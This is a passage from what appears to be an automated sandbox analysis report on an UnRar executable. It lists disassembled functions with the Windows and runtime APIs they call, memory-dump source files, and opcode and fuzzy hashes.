                                                            • Opcode Fuzzy Hash: e006a98f753282433694ae2ef84f848ae6f3492d77b08c245a1f38e856b72c4f
                                                            • Instruction Fuzzy Hash: E831A222B1BA42C2FA606E2DD954678A351AF04FD4F8A2171DE5D47BB4DE3CD5438720
                                                            Function 00007FF7AACCA600 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: File$BuffersFlushTime
                                                            • String ID:
                                                            • API String ID: 1392018926-0
                                                            • Opcode ID: 64fbd9dc4f8144db4e3b250e6a183c896313ab4178220768729e2b624826e3a5
                                                            • Instruction ID: 8697f4e746bd9f89e5ac132c3f51deca18299308f40473a2adbfa0d380e8eedf
                                                            • Opcode Fuzzy Hash: 64fbd9dc4f8144db4e3b250e6a183c896313ab4178220768729e2b624826e3a5
                                                            • Instruction Fuzzy Hash: CE21D126A0B742D5FA61AE51E0087BAE792AF01B94F965071CE4D037B1EE3CE48BC710
                                                            Function 00007FF7AACD3AE0 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: FromListPath_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 2469645512-0
                                                            • Opcode ID: 773418363329cc91f0a2d4369802ba4bb35b07547e972d9c21c641af4b230404
                                                            • Instruction ID: a88ee3a063f1b0850580ff6d6b585e1229f3a91279ca517f9c0eddc98c7f254e
                                                            • Opcode Fuzzy Hash: 773418363329cc91f0a2d4369802ba4bb35b07547e972d9c21c641af4b230404
                                                            • Instruction Fuzzy Hash: DE11B6A2B1678182F914AB25944426EA321EB84FF0F559331EABD137E9DE2CD882C310
                                                            Function 00007FF7AACCA710 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: 3540bcaf9f0392bd90dcfb112fc6969dd09b2552219b703c8101b0885a735f47
                                                            • Instruction ID: 829c2d9059fa203056cf32bce21ec02bbe40327f14dee49f17d60ef148c24a8e
                                                            • Opcode Fuzzy Hash: 3540bcaf9f0392bd90dcfb112fc6969dd09b2552219b703c8101b0885a735f47
                                                            • Instruction Fuzzy Hash: 47119D21A09A52C1FB60AF25E448268A261FB44BA4F955371EA7D526F8DF3CE583C710
                                                            Function 00007FF7AACBDB60 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • setbuf.LIBCMT ref: 00007FF7AACBDB73
                                                              • Part of subcall function 00007FF7AACF9CE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7AACFF217
                                                            • setbuf.LIBCMT ref: 00007FF7AACBDB87
                                                              • Part of subcall function 00007FF7AACBDC10: GetStdHandle.KERNEL32(?,?,?,00007FF7AACBDB96,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AACBDC16
                                                              • Part of subcall function 00007FF7AACBDC10: GetFileType.KERNELBASE(?,?,?,00007FF7AACBDB96,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AACBDC22
                                                              • Part of subcall function 00007FF7AACBDC10: GetConsoleMode.KERNELBASE(?,?,?,00007FF7AACBDB96,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AACBDC35
                                                              • Part of subcall function 00007FF7AACF9CBC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7AACF9CD0
                                                              • Part of subcall function 00007FF7AACF9D40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7AACF9E1C
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
                                                            • String ID:
                                                            • API String ID: 4044681568-0
                                                            • Opcode ID: d4e99438c6bf077a45b886d26ad55c63c2a98bccb997c74a5da267ca8b4ffc88
                                                            • Instruction ID: 37aaef1a586777918c5fe2560b5a68e24df5122597a278152a746866b50e381a
                                                            • Opcode Fuzzy Hash: d4e99438c6bf077a45b886d26ad55c63c2a98bccb997c74a5da267ca8b4ffc88
                                                            • Instruction Fuzzy Hash: AF01C206E0F29386FE59B37454627BAA5828F82310F9241BAE16F0A3E7CD5E24478771
                                                            Function 00007FF7AACE2C24 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7AACE2C79,?,?,?,?,00007FF7AACD02DA,?,?,00000000,00007FF7AACD0272), ref: 00007FF7AACE2C28
                                                            • GetProcessAffinityMask.KERNEL32 ref: 00007FF7AACE2C3B
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: Process$AffinityCurrentMask
                                                            • String ID:
                                                            • API String ID: 1231390398-0
                                                            • Opcode ID: 28d5677fd484f2d9b7fdabb1d29ed63133ced35ac21970a7fe41ba2240025ee9
                                                            • Instruction ID: f627a00ae6c0e1af166b3420073ab7698d8dacc205103e09b8820529d8f72832
                                                            • Opcode Fuzzy Hash: 28d5677fd484f2d9b7fdabb1d29ed63133ced35ac21970a7fe41ba2240025ee9
                                                            • Instruction Fuzzy Hash: FAE02B61B19982C2FF189B55C4405EEB391FFD8F40FC58036D50B83A24EE3CE14A8711
                                                            Function 00007FF7AACF0E98 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                            • String ID:
                                                            • API String ID: 1173176844-0
                                                            • Opcode ID: b71d3ccc74c6685922cbd592d5d29e9f616725518551b38badf2b000a953f4db
                                                            • Instruction ID: 54217bc308fee1dda2e37754480bd04e87bd3b482fd2fe3d8bc999e04f719829
                                                            • Opcode Fuzzy Hash: b71d3ccc74c6685922cbd592d5d29e9f616725518551b38badf2b000a953f4db
                                                            • Instruction Fuzzy Hash: A6E0B642E1B307E5FE9D316128260BD80400F19B70E9A1BB4E9BE092E7BD1DA8978330
                                                            Function 00007FF7AACFD234 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 485612231-0
                                                            • Opcode ID: 4349ef9170f68bd281ba5d44ca771c2281ff328d5e54b829e4d1a5ff49306598
                                                            • Instruction ID: a998326cafc3b87b36a97be957527633a094b1e4470ac71ac46c9a24de3769b4
                                                            • Opcode Fuzzy Hash: 4349ef9170f68bd281ba5d44ca771c2281ff328d5e54b829e4d1a5ff49306598
                                                            • Instruction Fuzzy Hash: B0E08662F0F703C6FF56B7F2545417CA2A0AF48B44B8600B0D91D86276DD2CA8878360
                                                            Function 00007FF7AACE5860 Relevance: 1.7, APIs: 1, Instructions: 167COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FF7AACE2A14: ReleaseSemaphore.KERNEL32 ref: 00007FF7AACE2A40
                                                              • Part of subcall function 00007FF7AACE2A14: CloseHandle.KERNELBASE ref: 00007FF7AACE2A5F
                                                              • Part of subcall function 00007FF7AACE2A14: DeleteCriticalSection.KERNEL32 ref: 00007FF7AACE2A76
                                                              • Part of subcall function 00007FF7AACE2A14: CloseHandle.KERNEL32 ref: 00007FF7AACE2A83
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACE5AC2
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$CriticalDeleteReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 904680172-0
                                                            • Opcode ID: bf5da8f27959b1d51bde5b1851978416995ea7bbf6e998aecc03a0b19153555f
                                                            • Instruction ID: b6f74ed52165f8ae0e2d468b9397229b55b71af0d66934d878e2abc3b1a5130a
                                                            • Opcode Fuzzy Hash: bf5da8f27959b1d51bde5b1851978416995ea7bbf6e998aecc03a0b19153555f
                                                            • Instruction Fuzzy Hash: 6561DC6270678AE2FE18EB21D5540BCA356FB40F90B954176D76D07AA6CF28E872C310
                                                            Function 00007FF7AACB90C0 Relevance: 1.7, APIs: 1, Instructions: 157COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::cancel_current_task
                                                            • String ID:
                                                            • API String ID: 118556049-0
                                                            • Opcode ID: b32735688d2195f178bf12d6f2fdaaf1076891aaa26a5f0065d61207a94603aa
                                                            • Instruction ID: 106d45c12c48d17ae05e009c5772b2ef6e64ac08b69ce6cf6059326b176af6c3
                                                            • Opcode Fuzzy Hash: b32735688d2195f178bf12d6f2fdaaf1076891aaa26a5f0065d61207a94603aa
                                                            • Instruction Fuzzy Hash: 21714D72505B81C0E7409F21E9402AEB3E8FB24B98F59163ADF984B7A9DF789061C324
                                                            Function 00007FF7AACC58F0 Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3668304517-0
                                                            • Opcode ID: 67229fc4015d8eb7dc82c6705cedb48288c4502818ab6f1825ef0e2239e9e908
                                                            • Instruction ID: a1dd4e5f42cc89b19c8213734e828b41268ad30ab1c021f97d74a4ae110d046a
                                                            • Opcode Fuzzy Hash: 67229fc4015d8eb7dc82c6705cedb48288c4502818ab6f1825ef0e2239e9e908
                                                            • Instruction Fuzzy Hash: 6251C162A4A78681FA40BF2694543B9A751EB41BD5F9520B6DE4C077E7CF3CE487C320
                                                            Function 00007FF7AACC52C8 Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 1011579015-0
                                                            • Opcode ID: 26aaf5cfec0297802413781ae124c205967cf226aa6415acdb6c983dab10aaad
                                                            • Instruction ID: 4d7f359bf3f2338259ec89e9bff7889270480e3d02f647b6bd6bf0b845683698
                                                            • Opcode Fuzzy Hash: 26aaf5cfec0297802413781ae124c205967cf226aa6415acdb6c983dab10aaad
                                                            • Instruction Fuzzy Hash: BD616D22A4A786C1FA50EF29D44437DA350FB84B85F8611B9DA8D076B9DF2CE443C760
                                                            Function 00007FF7AACC446C Relevance: 1.6, APIs: 1, Instructions: 123COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3668304517-0
                                                            • Opcode ID: f3c584123f50028c493fbe59015162980f34f15d5aab9fe7f43d539d4f5eee32
                                                            • Instruction ID: f4056556909b55c919fbbb49baaae64fbcc5d6059b9c4449cc3ce30cfdb88a0b
                                                            • Opcode Fuzzy Hash: f3c584123f50028c493fbe59015162980f34f15d5aab9fe7f43d539d4f5eee32
                                                            • Instruction Fuzzy Hash: AD517932606B81C6FB14DF25F54429DB3A9FB18B98F514225DFA903BA9DF38E062C314
                                                            Function 00007FF7AACF6FA0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                            • String ID:
                                                            • API String ID: 3947729631-0
                                                            • Opcode ID: c0aba12ee660d715d9135402413fca32341a10e7e582d5ef0be4fe82331e8360
                                                            • Instruction ID: 8561ff8dda4fd1eadd4ad95005635a790ec52fc4bf397e08616788ece8cea87d
                                                            • Opcode Fuzzy Hash: c0aba12ee660d715d9135402413fca32341a10e7e582d5ef0be4fe82331e8360
                                                            • Instruction Fuzzy Hash: 6A41D122A0A713C2FA14BB25986027DE251EF44740FC748B6D95E476F5DE7EE887C360
                                                            Function 00007FF7AACD1A00 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3668304517-0
                                                            • Opcode ID: 9cbfb451b66c450fb424b6bbb6a3fda53113babcd0f1130c9b9161e1f2b84b41
                                                            • Instruction ID: 032107eaa575d3250fcb4cec9cbf9dae1570d2a42ca13d65ffdca51f9643c1f9
                                                            • Opcode Fuzzy Hash: 9cbfb451b66c450fb424b6bbb6a3fda53113babcd0f1130c9b9161e1f2b84b41
                                                            • Instruction Fuzzy Hash: F131A022B16B51C8FB00EBA2E845BAD7371BB44B98F810575DE6D17BA9DF38D482C310
                                                            Function 00007FF7AACCC2CC Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD26000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2304076621.00007FF7AAD2C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7ff7aacb0000_UnRar.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3668304517-0
                                                            • Opcode ID: 59f357d822825d5de58c73d8bf0716ed53eebf01de4754b02adfef9bc40afe26
                                                            • Instruction ID: d6e4e73de9a1f2d276b68f78072221e8d32feb55f3e1e077e6f59f711069e229
                                                            • Opcode Fuzzy Hash: 59f357d822825d5de58c73d8bf0716ed53eebf01de4754b02adfef9bc40afe26
                                                            • Instruction Fuzzy Hash: 9631C122B09B42C9FB00EF74E4012EDB322EF557A4F812171DAAC17AE9DE28D452C320
                                                            Function 00007FF7AACDA054 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FF7AACDAFB4: RegOpenKeyExW.ADVAPI32 ref: 00007FF7AACDB034
                                                              • Part of subcall function 00007FF7AACDAFB4: RegQueryValueExW.ADVAPI32 ref: 00007FF7AACDB061
                                                              • Part of subcall function 00007FF7AACDAFB4: RegQueryValueExW.ADVAPI32 ref: 00007FF7AACDB0C5
                                                            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AACDA0F5
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2303579813.00007FF7AACB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AACB0000, based on PE: true
                                                            • Associated: 00000005.00000002.2303553417.00007FF7AACB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303651093.00007FF7AAD08000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303833006.00007FF7AAD1C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000005.00000002.2303904552.00007FF7AAD1E000.00000004.00000001.01000000.00000004.sdmpDownload File
